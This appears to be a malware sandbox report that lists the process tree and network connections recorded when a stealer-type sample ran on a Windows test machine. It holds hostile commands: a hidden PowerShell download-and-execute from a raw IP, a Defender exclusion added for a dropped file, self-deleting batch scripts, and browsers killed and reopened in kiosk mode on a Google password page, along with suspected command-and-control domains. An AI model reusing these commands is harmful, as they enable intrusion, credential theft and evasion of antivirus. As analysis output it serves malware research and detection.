C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe
"C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2EED.tmp\2EEE.tmp\2EEF.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe
"C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe"
C:\Users\Admin\AppData\Local\Temp\dll32.exe
"C:\Users\Admin\AppData\Local\Temp\dll32.exe"
C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe
"C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10107211121\PcAIvJ0.cmd"
C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe
"C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 1204
C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2752 -s 508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2608 -s 1016
C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe"
C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2052 -s 500
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp2961.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp2961.tmp.bat
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\8QpbZ8u9\Anubis.exe""
C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe
"C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Local\Temp\onefile_1616_133856873851862000\chromium.exe
C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe
"C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe
"C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Users\Admin\AppData\Local\Temp\dll32.exe
"C:\Users\Admin\AppData\Local\Temp\dll32.exe"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe
"C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 1200
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe
"C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe
"C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.0.1337352138\1171607553" -parentBuildID 20221007134813 -prefsHandle 1244 -prefMapHandle 1196 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd1ffbe0-fde8-41f7-b9f5-a2e143d89b2a} 300 "\\.\pipe\gecko-crash-server-pipe.300" 1324 106dbe58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.1.971295469\132527329" -parentBuildID 20221007134813 -prefsHandle 1540 -prefMapHandle 1536 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c80145c5-498f-4946-8dad-2f2b8108cd90} 300 "\\.\pipe\gecko-crash-server-pipe.300" 1552 f3eb258 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.2.1791177149\199354410" -childID 1 -isForBrowser -prefsHandle 2208 -prefMapHandle 2204 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a58b41a8-2a8b-4824-ab7a-c6cedf00c3b9} 300 "\\.\pipe\gecko-crash-server-pipe.300" 2220 175d9258 tab
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.3.1120652361\535779563" -childID 2 -isForBrowser -prefsHandle 2704 -prefMapHandle 2640 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b5a22e55-3f41-49f6-9837-3c5a9ea8369b} 300 "\\.\pipe\gecko-crash-server-pipe.300" 2776 1d70a658 tab
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.4.1509203630\1168830996" -childID 3 -isForBrowser -prefsHandle 3660 -prefMapHandle 3768 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {761025cf-1ac0-4ad9-91e7-7c0357446cb6} 300 "\\.\pipe\gecko-crash-server-pipe.300" 3796 e69758 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.5.1702620004\829867254" -childID 4 -isForBrowser -prefsHandle 3904 -prefMapHandle 3908 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5a7969e-1401-43b1-b1cd-37389839b617} 300 "\\.\pipe\gecko-crash-server-pipe.300" 3892 1b84d658 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.6.705501292\1687976917" -childID 5 -isForBrowser -prefsHandle 4064 -prefMapHandle 4068 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {90f30b2a-17ac-4871-b956-62a0716fd10e} 300 "\\.\pipe\gecko-crash-server-pipe.300" 4052 1b84dc58 tab
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp1065.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp1065.tmp.bat
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2880"
C:\Windows\system32\find.exe
find ":"
C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe
"C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2880"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2880"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2880"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2880"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2880"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2880"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe
"C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2880"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2880"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2880"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2880"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2880"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 1212
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2880"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2880"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2880"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Local\Temp\10107430101\cnntXtU.exe
"C:\Users\Admin\AppData\Local\Temp\10107430101\cnntXtU.exe"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2880"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2300"
C:\Windows\system32\find.exe
find ":"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | joyfulhezart.tech | udp |
| US | 8.8.8.8:53 | hardswarehub.today | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | hardrwarehaven.run | udp |
| US | 8.8.8.8:53 | techmindzs.live | udp |
| US | 8.8.8.8:53 | codxefusion.top | udp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 8.8.8.8:53 | biochextryhub.bet | udp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 8.8.8.8:53 | moderzysics.top | udp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| DE | 5.75.210.149:443 | | tcp |
| DE | 5.75.210.149:443 | | tcp |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| CH | 185.208.156.162:80 | 185.208.156.162 | tcp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 8.8.8.8:53 | seizedsentec.online | udp |
| US | 8.8.8.8:53 | strawpeasaen.fun | udp |
| US | 8.8.8.8:53 | quietswtreams.life | udp |
| US | 8.8.8.8:53 | starrynsightsky.icu | udp |
| US | 8.8.8.8:53 | earthsymphzony.today | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | farmingtzricks.top | udp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
